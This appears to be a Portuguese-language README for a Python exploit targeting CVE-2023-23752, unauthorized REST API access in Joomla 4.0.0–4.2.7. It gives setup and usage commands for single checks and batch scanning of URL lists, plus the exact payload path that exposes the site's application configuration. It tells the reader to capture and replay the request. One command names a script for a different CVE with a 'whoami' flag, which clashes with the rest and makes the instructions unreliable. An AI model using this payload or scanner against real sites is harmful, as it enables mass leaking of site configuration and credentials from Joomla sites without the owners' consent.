
Exploit baseado em Python para CVE-2023-23752 visando Joomla 4.0.0-4.2.7 acesso não autorizado à API REST, permitindo divulgação de informações sensíveis através de payloads elaborados.
CVE-2023-23752 - Recorrência da Vulnerabilidade de Acesso Não Autorizado do Joomla
Instalar a biblioteca python
pip install -r requirements.txt
Verificação de Vulnerabilidade
python3 CVE-2022-26134_check.py -u url -c whoami

Varredura em lote
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Acesse o endereço vulnerável, capture o pacote, repita o pacote de dados.

Joomla! CMS versão 4.0.0-4.2.7, devido a restrições inadequadas de acesso aos endpoints do serviço web, pode levar a acesso não autorizado à API REST, resultando em vazamento de informações confidenciais.